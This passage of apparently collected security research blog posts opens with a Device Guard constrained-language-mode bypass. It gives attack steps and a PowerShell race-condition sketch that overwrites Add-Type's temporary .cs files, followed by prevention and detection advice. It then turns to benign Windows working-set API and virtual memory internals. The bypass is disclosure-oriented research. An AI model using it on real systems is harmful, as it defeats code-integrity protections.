    Once the Microsoft.CSharp.CSharpCodeGenerator.Compile method is called, this is where csc.exe is ultimately invoked. After the Compile method returns, FromFileBatch takes the compiled artifacts, reads them in as a byte array, and then loads them using System.Reflection.Assembly.Load(byte[], byte[], Evidence). This is the same method called by msbuild.exe when compiling inline tasks – a known Device Guard UMCI bypass discovered by Casey Smith. Knowing this, I gained the confidence that if I could hijack the dropped .cs file, I would end up having a constrained language mode bypass, allowing arbitrary unsigned code execution. What we’re referring to here is known as a “time of check, time of use” (TOCTOU) attack. If I could manage to replace the dropped .cs file with my own prior to csc.exe consuming it, then I would win that race and perform the bypass. The only constraint imposed on me, however, would be that I would need to write a hijack payload within the constraints of constrained language mode. As it turns out, I was successful.

    Exploitation

    I wrote a function called Add-TypeRaceCondition that will accept attacker-supplied C# and get an allowed call to Add-Type to compile it and load it within the constraints of constrained language mode. The weaponized bypass is roughly broken down as follows:
    1. Spawn a child process of PowerShell that constantly tries to drop the malicious .cs file to %TEMP%.
    2. Maximize the process priority of the child PowerShell process to increase the likelihood of winning the race.
    3. In the parent PowerShell process, import a Microsoft-signed PowerShell module that calls Add-Type – I chose the PSDiagnostics module for this.
    4. Kill the child PowerShell process.
    5. At this point, you will have likely won the race and your type will be loaded in place of the legitimate one expected by PSDiagnostics.
    In reality, the payload wins the race a little more than 50% of the time. If Add-TypeRaceCondition doesn’t work on the first try, it will almost always work on the second try.

    Do note that while I weaponized this bypass for PowerShell, this can be weaponized using anything that would allow you to overwrite the dropped .cs file quickly enough. I've weaponized the bypass using a batch script, VBScript, and with WMI. I'll leave it up to the reader to implement a bypass using their language of choice.
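    For illustration, the core of the racing child process might look something like the sketch below. payload.cs is a placeholder for attacker-supplied C#, and the real Add-TypeRaceCondition additionally handles process priority and cleanup:

    # Minimal sketch: run in a child PowerShell process while the parent
    # imports a signed module that calls Add-Type.
    $MaliciousSource = Get-Content -Path .\payload.cs -Raw
    while ($true) {
        Get-ChildItem -Path "$env:TEMP\*.cs" -ErrorAction SilentlyContinue |
            ForEach-Object {
                Set-Content -Path $_.FullName -Value $MaliciousSource -ErrorAction SilentlyContinue
            }
    }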

    Operational Considerations

    It's worth noting that while an application whitelisting bypass is just that, it also serves as a method of code execution that is likely to evade defenses. In this bypass, an attacker need only drop a C# file to disk which results in the temporary creation of a DLL on disk which is quickly deleted. Depending upon the payload used, some anti-virus solutions with real-time scanning enabled could potentially have the ability to quarantine the dropped DLL before it's consumed by System.Reflection.Assembly.Load.

    Prevention

    Let me first emphasize that this is a .NET issue, not a PowerShell issue. PowerShell was simply chosen as a convenient means to weaponize the bypass. As I’ve already stated, this issue doesn’t just apply when PowerShell calls Add-Type; it applies whenever any application calls any of the CodeDomProvider.CompileAssemblyFrom methods. Researchers will continue to target signed applications that make such method calls until this issue is mitigated.

    A possible user mitigation for this bypass would be to block csc.exe with a Device Guard rule. I would personally advise against this, however, since there are many legitimate Add-Type calls in PowerShell and presumably in other legitimate applications. I’ve provided a sample Device Guard CI rule that you can merge into your policy if you like though. I created the rule with the following code:

    # Copy csc.exe into the following directory.
    # csc.exe should be the only file in this directory.
    $CSCTestPath = '.\Desktop\ToBlock\'
    $PEInfo = Get-SystemDriver -ScanPath $CSCTestPath -UserPEs -NoShadowCopy

    $DenyRule = New-CIPolicyRule -Level FileName -DriverFiles $PEInfo -Deny
    $DenyRule[0].SetAttribute('MinimumFileVersion', '65535.65535.65535.65535')

    $CIArgs = @{
        FilePath = "$($CSCTestPath)block_csc.xml"
        Rules = $DenyRule
        UserPEs = $True
    }

    New-CIPolicy @CIArgs


    Detection

    Unfortunately, detection using free, off-the-shelf tools will be difficult: the disk artifacts are created and subsequently deleted, and System.Reflection.Assembly.Load(byte[]) does not generate a traditional module load event that something like Sysmon would be able to detect.

    Vendors with the ability to hash files on the spot should consider assessing the prevalence of DLLs created by csc.exe. Files with low prevalence should be treated as suspicious. Also, unfortunately, since dynamically created DLLs by their nature will not be signed, there will be no code signing heuristics to key off of.

    It's worth noting that I intentionally didn't mention PowerShell v5 ScriptBlock logging as a detection option since PowerShell isn't actually required to achieve this bypass.

    Conclusion

    I remain optimistic about Device Guard’s ability to enforce user mode code integrity. It is a difficult problem to tackle, however, and there is plenty of attack surface. In most cases, Device Guard UMCI bypasses can be mitigated by a user in the form of CI blacklist rules. Unfortunately, in my opinion, no realistic user mitigation of this particular bypass is possible. Microsoft not servicing such a bypass is the exception and not the norm. Please don’t let this discourage you from reporting any bypasses that you may find to [email protected]. It is my hope that releasing this bypass will lead to it eventually being addressed and will give other vendors the opportunity to mitigate it.

    Previously serviced bypasses for reference:

    Breaking backwards compatibility: a 5 year old bug deep within Windows

    By: Nemi
    20 July 2017 at 23:48
    Microsoft has a great track record of maintaining support for legacy software running under Windows. There is an entire compatibility layer baked into the OS that is dedicated to fixing issues with decades old software running on modern iterations of Windows. To learn more about this application compatibility infrastructure, I'd recommend swinging over to Alex Ionescu's blog. He has a great set of posts describing the technical details on how user (even kernel) mode shimming is implemented.

    With all of that said, it's an understatement to say that Microsoft takes backwards compatibility seriously. Occasionally, the humans at Microsoft make mistakes. Usually, though, they're very quick to address these problems.

    This blog post will go over an unnoticed bug that was introduced in Windows 8 with a documented Win32 API. At the time of this post, this bug is still present in Windows 10 (Creator's Update) and has been around for over 5 years.

    Forgotten Win32 APIs

    There is a set of Win32 APIs that were introduced in Windows XP to monitor the working set of a process. A process' working set is a collection of pages, chunks of memory, that are currently in RAM (physical memory) and are accessible to that process without inducing a page fault. In particular, the APIs of interest for us are InitializeProcessForWsWatch and GetWsChanges/GetWsChangesEx.

    After reading the MSDN documentation, it's easy to discover what the intended use for these APIs was. These APIs profile the number of page faults that occur within a process' address space.

    What's a page fault? A quick recap.

    There are 3 general categories of page faults. 

    A hard page fault occurs when memory is accessed that's not currently in RAM (physical). In situations like this, the OS will need to retrieve the memory from disk (e.g. pagefile.sys) and make it accessible to the faulting process. 

    A soft page fault occurs when memory is in RAM (physical), but not currently accessible to the process that induced the fault. This memory might be shared amongst multiple processes and the process that caused the page fault might not have it mapped into its working set. These types of page faults are much more performant than hard page faults since no disk I/O is performed.

    The final type of page fault is known formally as an invalid fault. These are also referred to as access violations. This can be caused when a program, for example, tries to access unallocated memory or tries to write to memory that's marked read-only.

    Paging is necessary to make modern operating systems work. You probably have many processes running on your system, but not nearly enough RAM to hold all the possible contents of every process in physical memory at once. To learn more about paging, I strongly recommend this article posted by my colleague.

    Demo 

    The best way to illustrate what's broken is through an example. I created two simple programs. 

    The first application, WorkingSetWatch.exe, implements the InitializeProcessForWsWatch and GetWsChangeEx APIs. This application logs when a specific memory region is paged into our process' working set:

    The second application, ReadProcessMemory.exe, implements reading of an arbitrary memory blob from another target process' memory space:

    The basic idea is to use ReadProcessMemory.exe to read from the monitored memory address inside of WorkingSetWatch.exe. This will induce a page fault.
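    For reference, a rough sketch of the core of WorkingSetWatch.exe (error handling trimmed, and the filtering to one specific memory region omitted):

    #include <windows.h>
    #include <psapi.h>
    #include <cstdio>

    int main()
    {
        // Must be called before the page faults we want to observe occur.
        if (!InitializeProcessForWsWatch(GetCurrentProcess()))
            return 1;

        PSAPI_WS_WATCH_INFORMATION_EX entries[1024];
        for (;;)
        {
            DWORD size = sizeof(entries);
            // Drains (and resets) the kernel's 1024-entry buffer; the last
            // valid record is terminated with a NULL FaultingPc.
            if (GetWsChangesEx(GetCurrentProcess(), entries, &size))
            {
                for (DWORD i = 0; entries[i].BasicInfo.FaultingPc != nullptr; ++i)
                    printf("Page fault at VA %p (PC %p)\n",
                           entries[i].BasicInfo.FaultingVa,
                           entries[i].BasicInfo.FaultingPc);
            }
            Sleep(1);
        }
    }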

    Windows 7: Build 7601 (SP1)

    The WorkingSetWatch.exe application works as expected. We're able to read any (valid) sized buffer using ReadProcessMemory.exe and log it.


    Windows 10: Build 15063 (Creator's Update)

    Unfortunately, WorkingSetWatch.exe does not seem to log the page fault that occurs when our remote application, ReadProcessMemory.exe, reads a buffer greater than or equal to 512 bytes; however, it does seem to work as expected when a read occurs that's less than 512 bytes.


    This renders these working set APIs useless for profiling purposes on Windows 8+.

    What went wrong?

    To determine what went wrong, we'll need to reverse engineer parts of Windows and see exactly how the implementation changed in Windows 8+ from Windows 7.

    All disassembly and pseudo-source is reconstructed from system files that are provided with Windows x64 10.0.15063 (Creator's Update).

    Enabling process working set logging

    To enable working set logging for a process, we need to call InitializeProcessForWsWatch. From the MSDN documentation, we're told that on newer versions of Windows this API is exported as K32InitializeProcessForWsWatch within kernel32.dll. Our analysis begins there:

    This function is very simple. It invokes an import from another library. In this case, it executes a function of the same name (K32InitializeProcessForWsWatch), but contained within a different library, api-ms-win-core-psapi-l1-1-0.dll. This library doesn't exist on disk, but rather resolves to an API Set mapping corresponding to kernelbase.dll (which does exist on disk) for this version of Windows. A look into kernelbase.dll's implementation shows that a call to NtSetInformationProcess is performed without any parameter marshalling:

    Our next target is NtSetInformationProcess within ntdll.dll:

    This is just a simplistic syscall stub that will eventually make its way into the implementation contained within ntoskrnl.exe, the Windows kernel. nt!NtSetInformationProcess is a massive function that contains a huge switch statement that supports all the different PROCESSINFOCLASS that can be passed to it.


    We're interested in the PROCESSINFOCLASS for ProcessWorkingSetWatch. This is case 15 (0xF). A snippet of the relevant parts (with the cleaned-up disassembly):

    It's interesting to note that you're able to start monitoring on a process' working set with either a class of ProcessWorkingSetWatch (15) or ProcessWorkingSetWatchEx (42). This can be achieved by invoking nt!NtSetInformationProcess directly instead of going through the documented route with kernel32!InitializeProcessForWsWatch. The latter utilizes only the ProcessWorkingSetWatch class.

    The actual logic of nt!NtSetInformationProcess is pretty trivial to understand. A blob of memory is allocated per process that we're monitoring. This blob of memory is a _PAGEFAULT_HISTORY structure and contains up to 1024 _PROCESS_WS_WATCH_INFORMATION structures internally. Each _PROCESS_WS_WATCH_INFORMATION structure is an entry that describes a page fault. These entries will be cycled through as the array fills up. Recall from the MSDN documentation (the "Remarks" section) that you must call GetWsChanges/Ex with enough frequency to avoid record loss. This makes perfect sense because we can see that there are a fixed number of these records (1024) allocated. I took the liberty of documenting these structures:
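    Here is a reconstruction of those structures based on the behavior described in this post; member names beyond the ones referenced in the text (WatchInfo, MissingRecords, EntrySelector.Busy, FaultingPc/FaultingVa) are guesses:

    typedef struct _PROCESS_WS_WATCH_INFORMATION
    {
        PVOID FaultingPc;  // instruction pointer that caused the fault
        PVOID FaultingVa;  // faulting address; low bit: 0 = hard, 1 = soft fault
    } PROCESS_WS_WATCH_INFORMATION, *PPROCESS_WS_WATCH_INFORMATION;

    typedef struct _PAGEFAULT_HISTORY
    {
        union
        {
            struct
            {
                ULONG FaultIndex : 31; // next free slot in WatchInfo
                ULONG Busy : 1;        // set while a query is draining the buffer
            } EntrySelector;
            volatile LONG Synch;       // manipulated atomically via Interlocked*** ops
        };
        ULONG MissingRecords;          // faults dropped while the buffer was full or busy
        PROCESS_WS_WATCH_INFORMATION WatchInfo[1024];
    } PAGEFAULT_HISTORY, *PPAGEFAULT_HISTORY;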

    The union at the beginning of the _PAGEFAULT_HISTORY structure may be a little confusing, but it'll be explained later.

    On successful execution of this routine, the monitored process object will have an internal member (_EPROCESS.WorkingSetWatch) updated to include this recently allocated _PAGEFAULT_HISTORY pointer. Additionally, the PsWatchEnabled global will be set. This value informs the system to track page faults for processes. It will remain set until the system reboots (even if there are no processes running that have working sets tracked). There are only 2 references to PsWatchEnabled and we've already inspected the one in nt!NtSetInformationProcess.


    Our investigation leads us to nt!KiPageFault.

    Logging a page fault

    When a page fault occurs, the CPU transfers execution to nt!KiPageFault:

    If the PsWatchEnabled global is set, that means we've enabled working set logging for processes on the system and execution is passed to nt!PsWatchWorkingSet. This function is documented below:

    As I mentioned above, there are 3 types of page faults. Access violations are not logged to our process' working set due to an early out by nt!MmAccessFault in nt!KiPageFault. Since this function is executed for the other 2 types of page faults (hard and soft) on the system, it will be accessed heavily by the operating system. Luckily, one of the first things the routine does is check whether or not a working set watch was enabled on the process where the page fault occurred. If there is no working set watch on the process, the routine completes.

    As per the documentation, nt!PsWatchWorkingSet will not function while records are being processed (EntrySelector.Busy). We'll describe this part in depth at a later time. Since higher priority interrupts can preempt our working set monitor, most of the logic in this routine needs to have adequate sanity (safety) checks and complete as atomically (Interlocked*** operations) as possible. The first part of the function will safely select a free index in the _PAGEFAULT_HISTORY.WatchInfo array that it can use for logging purposes. If the array is full (there can be at most 1024 entries), a "miss" is recorded (_PAGEFAULT_HISTORY.MissingRecords) and the routine completes. If everything is successful, a page fault event is recorded in a free slot in the _PAGEFAULT_HISTORY.WatchInfo array. An interesting (and undocumented) feature changes the entry's _PROCESS_WS_WATCH_INFORMATION.FaultingVa least significant bit to 0 if a hard page fault occurred and 1 if a soft page fault occurred.

    Ultimately, there doesn't seem to be any apparent bugs with this code. Additionally, this code matches very closely to the Windows 7 version which we know works. Our investigation leads us to the working set watch retrieval functions: GetWsChanges/Ex.

    Querying working set logging

    For article brevity, I'll give a quick summary of the call-flow of kernel32!GetWsChanges (kernel32!K32GetWsChanges) and kernel32!GetWsChangesEx (kernel32!K32GetWsChangesEx). These functions will call into their kernelbase.dll variants. From there, they will branch into kernelbase!GetWsChangesInternal which will invoke ntdll!NtQueryInformationProcess with the appropriate PROCESSINFOCLASS. In particular, the ProcessWorkingSetWatch class will be used for the GetWsChanges family of functions and ProcessWorkingSetWatchEx will be used for the others. From ntdll!NtQueryInformationProcess, a syscall will be made. This makes it to the implementation of NtQueryInformationProcess within the kernel. A massive switch statement awaits:

    The part that interests us resides one level deeper within nt!PspQueryWorkingSetWatch:

    There's some input validation (e.g. alignment checks) and a safety check (nt!ExIsRestrictedCaller) to avoid kernel pointer leaks in low integrity processes. After that, the process object is retrieved from the supplied process handle. The operating system checks to see that the _EPROCESS.WorkingSetWatch member is set. Just like the documentation states, at most one query can access a process' working set buffer at a time (EntrySelector.Busy). Additionally, while the buffer is being accessed, logging (by nt!PsWatchWorkingSet in nt!KiPageFault) will produce misses.

    As long as there's enough space in the user supplied buffer, the operating system will copy over the entry array to the user supplied buffer. The data will be structured in the appropriate way for the appropriate PROCESSINFOCLASS. The last entry in the user supplied buffer (PSAPI_WS_WATCH_INFORMATION/EX) will be terminated with a FaultingPc member of NULL. Additionally, the number of "misses" will be recorded in the FaultingVa member of the last entry.

    Finally, the _PAGEFAULT_HISTORY.WatchInfo array of the _EPROCESS.WorkingSetWatch will be reset after a successful call.
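
    Putting the pieces together, a minimal consumer of these APIs might look like the sketch below. This is a hedged approximation for illustration only - the WorkingSetWatch.exe harness used in our tests is not reproduced here and may differ:

    #include <windows.h>
    #include <psapi.h>
    #include <stdio.h>

    int main(void)
    {
        // Sets PsWatchEnabled and allocates _EPROCESS.WorkingSetWatch for
        // the target process (here, ourselves, for simplicity).
        if (!InitializeProcessForWsWatch(GetCurrentProcess()))
            return 1;

        // ... run code that faults pages into the working set ...

        // Drains the _PAGEFAULT_HISTORY.WatchInfo array. The final entry
        // has a NULL FaultingPc, and its FaultingVa holds the miss count.
        PSAPI_WS_WATCH_INFORMATION_EX records[1024];
        DWORD cb = sizeof(records);

        if (GetWsChangesEx(GetCurrentProcess(), records, &cb))
        {
            for (DWORD i = 0; records[i].BasicInfo.FaultingPc != NULL; i++)
            {
                printf("PC: %p VA: %p\n",
                       records[i].BasicInfo.FaultingPc,
                       records[i].BasicInfo.FaultingVa);
            }
        }

        return 0;
    }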

    /rant.

    The InitializeProcessForWsWatch and GetWsChanges/Ex APIs are surprisingly finicky. There are many odd restrictions and caveats that make it difficult for developers to retrieve information about the complete set of page faults that occurred within a process.

    There is a very good chance that you will run into situations where records wind up missing, especially in a multi-processor, multi-threaded environment. For example, if one thread is querying the working set of a process while a page fault occurs on another thread within that same process, a miss could be recorded, since the _PAGEFAULT_HISTORY.Busy member will be held by nt!PspQueryWorkingSetWatch. This prevents the page fault logging logic in nt!PsWatchWorkingSet from running. Functionally, this weakens the usability of the API for profiling purposes. To compound the problem, only 1024 entries can be stored in the array between calls to GetWsChanges/Ex. That's at most 4 MB (1024*PAGE_SIZE) of page fault history, which really isn't enough for modern applications, which can be very complex.

    In our specific situation, we ran our tests on a VM that had 1 processor allocated to it. Furthermore, our application was simple enough that it had 1 thread. This mitigates the chance of page fault "misses". Additionally, after a thorough investigation of the working set APIs, we've concluded that we've still not discovered where the bug is. In particular, why does the buffer size play a role in the success of these APIs? In our demo, we were unable to log page faults on Windows 10 when the buffer size was greater than or equal to 512 bytes. Is it possible that the bug is not within WorkingSetWatch.exe, but rather ReadProcessMemory.exe?

    To continue our investigation, we need to turn to ReadProcessMemory.exe.

    Reading memory

    The ReadProcessMemory.exe application is simple enough to understand. We know that we're not logging a page fault when we're reading a buffer that is greater than or equal to 512 bytes. Since there is no apparent bug in the working set APIs, the problem most likely resides in kernel32!ReadProcessMemory.

    I'll step past the irrelevant details; the same strategy applies as in the previous parts. In particular, kernel32!ReadProcessMemory calls into kernelbase!ReadProcessMemory. These functions do nothing special and more-or-less directly issue a system call by invoking ntdll!NtReadVirtualMemory. This takes us to the implementation of nt!ReadVirtualMemory in the kernel:

    This function just invokes nt!MiReadWriteVirtualMemory. On some versions of ntoskrnl, this routine may just be inlined into the caller's body.

    Aside from a check that prevents reading and writing to protected processes (ProcessObject->Pcb.SecurePid), this function is nearly identical to the one in the Windows 7 kernel. We need to go deeper. We traverse into nt!MmCopyVirtualMemory.

    This function is massive. It contains many subfunctions that have been inlined. For article brevity, only the important parts of nt!MmCopyVirtualMemory will be highlighted. One of the first things this routine does is search for the VAD entries that correspond to the input addresses (FromAddress and ToAddress). The idea is to leverage the "region size" information for the memory, but this isn't really relevant to our bug. We'll leave the discussion of the VAD (Virtual Address Descriptor) for another time.

    nt!MmCopyVirtualMemory's next task is to determine the input buffer's length. In particular, there are a couple checks against the buffer length and the value 512. This is significant to us because we know the bug only seems to manifest when the buffer size is greater than or equal to 512 bytes.

    Basically, it seems that if the buffer is greater than or equal to 512 bytes, nt!MmCopyVirtualMemory will utilize nt!MmProbeAndLockPages and nt!MmMapLockedPagesSpecifyCache followed by a memcpy to clone over memory.

    If the buffer is less than 512 bytes, nt!MmCopyVirtualMemory will just leverage memcpy directly by using a buffer on the stack or a buffer allocated in dynamic memory (based on buffer size) via nt!ExAllocatePoolWithTag.

    This is probably done for performance reasons. Larger memory copies probably benefit from direct mapping instead of memory pool copying. If we do leverage memory pool copying (buffers that are less than 512 bytes in size), we trigger a page fault and the event is logged by our WorkingSetWatch.exe application. On the other hand, if we leverage a direct mapping to copy memory, we do not trigger a page fault.
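
    A trivial way to observe this threshold is to issue the same read at 511 and then 512 bytes and confirm (via a working set watch on the target) that only the former produces a loggable fault. The sketch below reads from its own process purely for brevity - the original demo used the separate WorkingSetWatch.exe and ReadProcessMemory.exe programs:

    #include <windows.h>
    #include <stdio.h>

    int main(void)
    {
        static char source[512];
        char dest[512];
        SIZE_T bytesRead;

        // 511 bytes: stack/pool bounce-buffer path - page faults are logged.
        ReadProcessMemory(GetCurrentProcess(), source, dest, 511, &bytesRead);

        // 512 bytes: MDL mapping path - no loggable page fault on Windows 10.
        ReadProcessMemory(GetCurrentProcess(), source, dest, 512, &bytesRead);

        printf("reads complete\n");
        return 0;
    }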

    It would be incorrect to assume that this optimization did not exist on Windows 7. On the contrary, very similar logic exists inside the older version of nt!MmCopyVirtualMemory. However, something did change; otherwise, we would not see any discrepancy in our WorkingSetWatch program. Our investigation leads us into nt!MmProbeAndLockPages.

    The bug: an optimization in nt!MmProbeAndLockPages

    The implementation of nt!MmProbeAndLockPages underwent drastic changes between Windows 7 and now. If you looked at these two functions side-by-side, you'd quickly notice that the Windows 7 implementation was in some ways much simpler.

    The purpose of nt!MmProbeAndLockPages (per the documentation) is to ensure that the specified virtual pages (in the argument contained within MemoryDescriptorList) are backed by physical memory. Additionally, there is a series of permission checks to ensure that the virtual pages permit the user-specified access rights. In Windows 7, to perform this access check, the routine actually "probed" the memory by directly accessing it. This would induce a page fault in the context of the correct process and therefore we'd be able to log it using our WorkingSetWatch.exe application.

    On Windows 10, this process was optimized. Instead of accessing the memory directly, a PTE (Page Table Entry) walk is performed to ensure that the correct permissions exist. This change makes the process more efficient, especially since the PTEs are leveraged to lock the memory into physical pages anyway.


    OS development isn't easy

    One seemingly inconspicuous change can break functionality in an entirely unrelated part of the operating system. In our case, an optimization in the underlying logic of nt!MmProbeAndLockPages broke backwards compatibility of the working set APIs. This bug seems to have gone entirely unnoticed, but it unfortunately renders the GetWsChanges/Ex APIs useless for performance profiling.

    A potential fix for Microsoft would be to fall back to inducing a page fault for "invalid" pages when the PsWatchEnabled global is set or, more granularly, when a process' _EPROCESS.WorkingSetWatch is set.

    Exploring Windows virtual memory management

    14 August 2017 at 03:23
    In a previous post, we discussed the IA-32e 64-bit paging structures, and how they can be used to turn virtual addresses into physical addresses. They're a simple but elegant way to manage virtual address mappings as well as page permissions with varying granularity of page sizes. All of which is provided by the architecture. But as one might expect, once you add an operating system like Windows into the mix, things get a little more interesting.

    The problem of per-process memory

    In Windows, a process is nothing more than a simple container of threads and metadata that represents a user-mode application. It has its own memory so that it can manage the different pieces of data and code that make the process do something useful. Let's consider, then, two processes that both try to read and write from the memory located at the virtual address 0x00000000`11223344. Based on what we know about paging, we expect that the virtual address is going to end up translating into the same physical address (let's say 0x00000001`ff003344 as an example) in both processes. There is, after all, only one CR3 register per processor, and the hardware dictates that the paging structure root is located in that register.

    Figure 1: If the two processes' virtual addresses would translate to the same physical address, then we expect that they would both see the same memory, right?

    Of course, in reality we know that it can't work that way. If we use one process to write to a virtual memory address, and then use another process to read from that address, we shouldn't get the same value. That would be devastating from a security and stability standpoint. In fact, the same permissions may not even be applied to that virtual memory in both processes.

    But how does Windows accomplish this separation? It's actually pretty straightforward: when switching threads in kernel-mode or user-mode (called a context switch), Windows stores off or loads information about the current thread including the state of all of the registers. Because of this, Windows is able to swap out the root of the paging structures when the thread context is switched by changing the value of CR3, effectively allowing it to manage an entirely separate set of paging structures for each process on the system. This gives each process a unique mapping of virtual memory to physical memory, while still using the same virtual address ranges as another process. The PML4 table pointer for each user-mode process is stored in the DirectoryTableBase member of an internal kernel structure called the EPROCESS, which also manages a great deal of other state and metadata about the process.

    Figure 2: In reality, each process has its own set of paging structures, and Windows swaps out the value of the CR3 register when it executes within that process. This allows virtual addresses in each process to map to different physical addresses.

    We can see the paging structure swap between processes for ourselves if we do a little bit of exploration using WinDbg. If you haven't already set up kernel debugging, you should check out this article to get yourself started. Then follow along below.

    Let's first get a list of processes running on the target system. We can do that using the !process command. For more details on how to use this command, consider checking out the documentation using .hh !process. In our case, we pass parameters of zero to show all processes on the system.


    We can use notepad.exe as our target process, but you should be able to follow along with virtually any process of your choice. The next thing we need to do is attach ourselves to this process - simply put, we need to be in this process' context. This lets us access the virtual memory of notepad.exe by remapping the paging structures. We can verify that the context switch is happening by watching what happens to the CR3 register. If the virtual memory we have access to is going to change, we expect that the value of CR3 will change to new paging structures that represent notepad.exe's virtual memory. Let's take a look at the value of CR3 before the context switch.


    We know that this value should change to the DirectoryTableBase member of the EPROCESS structure that represents notepad.exe when we make the switch. As a matter of interest, we can take a look at that structure and see what it contains. The PROCESS fffffa8019218b10 line emitted by the debugger when we listed all processes is actually the virtual address of that process' EPROCESS structure.


    The fully expanded EPROCESS structure is massive, so everything after what we're interested in has been omitted from the results above. We can see, though, that the DirectoryTableBase is a member at +0x028 of the process control block (KPROCESS) structure that's embedded as part of the larger EPROCESS structure.

    According to this output, we should expect that CR3 will change to 0x00000006`52e89000 when we switch to this process' context in WinDbg.

    To perform the context swap, we use the .process command and indicate that we want an invasive swap (/i) which will remap the virtual address space and allow us to do things like set breakpoints in user-mode memory. Also, in order for the process context swap to complete, we need to allow the process to execute once using the g command. The debugger will then break again, and we're officially in the context of notepad.exe.


    Okay! Now that we're in the context we need to be in, let's check the CR3 register to verify that the paging structures have been changed to the DirectoryTableBase member we saw earlier.


    Looks like it worked as we expected. We would find a unique set of paging structures at 0x00000006`52e89000 that represented the virtual to physical address mappings within notepad.exe. This is essentially the same kind of swap that occurs each time Windows switches to a thread in a different process.

    Virtual address ranges

    While each process gets its own view of virtual memory and can re-use the same virtual address range as another process, there are some consistent rules of thumb that Windows abides by when it comes to which virtual address ranges store certain kinds of information.

    To start, each user-mode process is allowed a user-mode virtual address space ranging from 0x000`00000000 to 0x7ff`ffffffff, giving each process a theoretical maximum of 8TB of virtual memory that it can access. Then, each process also has a range of kernel-mode virtual memory that is split up into a number of different subsections. This much larger range gives the kernel a theoretical maximum of 248TB of virtual memory, ranging from 0xffff0800`00000000 to 0xffffffff`ffffffff. The remaining address space is not actually used by Windows, though, as we can see below.


    Figure 3: All possible virtual memory, divided into the different ranges that Windows enforces. The virtual addresses for the kernel-mode regions may not be true on Windows 10, where these regions are subject to address space layout randomization (ASLR). Credits to Alex Ionescu for specific kernel space mappings.

    Currently, there is an extremely large “no man's land” of virtual memory space between the user-mode and kernel-mode ranges of virtual memory. This range of memory isn't wasted, though; it's just not addressable due to the current architecture constraint of 48-bit virtual addresses, which we discussed in our previous article. If there existed a system with 16EB of physical memory - enough memory to address all possible 64-bit virtual memory - the extra physical memory would simply be used to hold the pages of other processes, so that many processes' memory ranges could be resident in physical memory at once.

    As an aside, one other interesting property of the way Windows handles virtual address mapping is being able to quickly tell kernel pointers from user-mode pointers. Memory that is mapped as part of the kernel has the highest order bits of the address (the 16 bits we didn't use as part of the linear address translation) set to 1, while user-mode memory has them set to 0. This ensures that kernel-mode pointers begin with 0xFFFF and user-mode pointers begin with 0x0000.
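
    A quick sketch of that check (ignoring non-canonical addresses, which fall into the unaddressable gap discussed above):

    #include <stdbool.h>
    #include <stdint.h>

    // Kernel-mode pointers on x64 Windows have the top 16 bits set,
    // while user-mode pointers have them clear.
    static bool IsKernelModePointer(uint64_t va)
    {
        return (va >> 48) == 0xFFFF;
    }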

    A tree of virtual memory: the VAD

    We can see that the kernel-mode virtual memory is nicely divided into different sections. But what about user-mode memory? How does the memory manager know which portions of virtual memory have been allocated, which haven't, and details about each of those ranges? How can it know if a virtual address within a process is valid or invalid? It could walk the process' paging structures to figure this out every time the information was needed, but there is another way: the virtual address descriptor (VAD) tree.

    Each process has a VAD tree that can be located in the VadRoot member of the aforementioned EPROCESS structure. The tree is a balanced binary search tree, with each node representing a region of virtual memory within the process.

    Figure 4: The VAD tree is balanced with lower virtual page numbers to the left, and each node providing some additional details about the memory range.

    Each node gives details about the range of addresses, the memory protection of that region, and some other metadata depending on the state of the memory it is representing.

    We can use our friend WinDbg to easily list all of the entries in the VAD tree of a particular process. Let's have a look at the VAD entries from notepad.exe using !vad.


    The range of addresses covered by a given VAD entry is stored as virtual page numbers - similar to a PFN, but simply in virtual memory. This means that an entry representing a starting VPN of 0x7f and an ending VPN of 0x8f would actually be representing virtual memory from address 0x00000000`0007f000 to 0x00000000`0008ffff.
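
    The conversion is a simple page-size shift, as in this small sketch (assuming standard 4 KB pages):

    #include <stdint.h>

    // Expand a VAD entry's VPN range into a virtual address range.
    static uint64_t VpnToStart(uint64_t vpn) { return vpn << 12; }
    static uint64_t VpnToEnd(uint64_t vpn)   { return ((vpn + 1) << 12) - 1; }

    // VpnToStart(0x7f) == 0x7f000 and VpnToEnd(0x8f) == 0x8ffff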

    There are a number of complexities of the VAD tree that are outside the scope of this article. For example, each node in the tree can be one of three different types depending on the state of the memory being represented. In addition, a VAD entry may contain information about the backing PTEs for that region of memory if that memory is shared. We will touch more on that concept in a later section.

    Let's get physical

    So we now know that Windows maintains separate paging structures for each individual process, and some details about the different virtual memory ranges that are defined. But the operating system also needs a central mechanism to keep track of each individual page of physical memory. After all, it needs to know what's stored in each physical page, whether it can write that data out to a paging file on disk to free up memory, how many processes are using that page for the purposes of shared memory, and plenty of other details for proper memory management.

    That's where the page frame number (PFN) database comes in. A pointer to the base of this very large structure can be located at the symbol nt!MmPfnDatabase, but we know based on the kernel-mode memory ranges that it starts at the virtual address 0xfffffa80`00000000, except on Windows 10 where this is subject to ASLR. (As an aside, WinDbg has a neat extension for dealing with the kernel ASLR in Windows 10 - !vm 0x21 will get you the post-KASLR regions). For each physical page available on the system, there is an nt!_MMPFN structure allocated in the database to provide details about the page.

    Figure 5: Each physical page in the system is represented by a PFN entry structure in this very large, contiguous data structure.

    Though some of the bits of the nt!_MMPFN structure can vary depending on the state of the page, that structure generally looks something like this:


    A page represented in the PFN database can be in a number of different states. The state of the page will determine what the memory manager does with the contents of that page.

    We won't be focusing on the different states too much in this article, but there are several: active, transition, modified, free, and bad, to name a few. It is definitely worth mentioning that, for efficiency reasons, Windows maintains linked lists comprised of all of the nt!_MMPFN entries that are in a specific state. This makes it much easier to traverse all pages in a given state, rather than having to walk the entire PFN database. For example, it allows the memory manager to quickly locate all of the free pages when memory needs to be paged in from disk.

    Figure 6: Different linked lists make it easier to walk the PFN database according to the state of the pages, e.g. walk all of the free pages contiguously.

    Another purpose of the PFN database is to help facilitate the translation of physical addresses back to their corresponding virtual addresses. Windows uses the PFN database to accomplish this during calls such as nt!MmGetVirtualForPhysical. While it is technically possible to search all of the paging structures for every process on the system in order to work backwards up the paging structures to get the original virtual address, the fact that the nt!_MMPFN structure contains a reference to the backing PTE, coupled with some clever allocation rules by Microsoft, allows them to easily convert back to a virtual address using the PTE and some bit shifting.

    For a little bit of practical experience exploring the PFN database, let's find a region of memory in notepad.exe that we can take a look at. One area of memory that could be of interest is the entry point of our application. We can use the !dh command to display the PE header information associated with a given module in order to track down the address of the entry point.

    Because we've switched into a user-mode context in one of our previous examples, WinDbg will require us to reload our symbols so that it can make sense of everything again. We can do that using the .reload /f command. Then we can look at notepad.exe's headers:


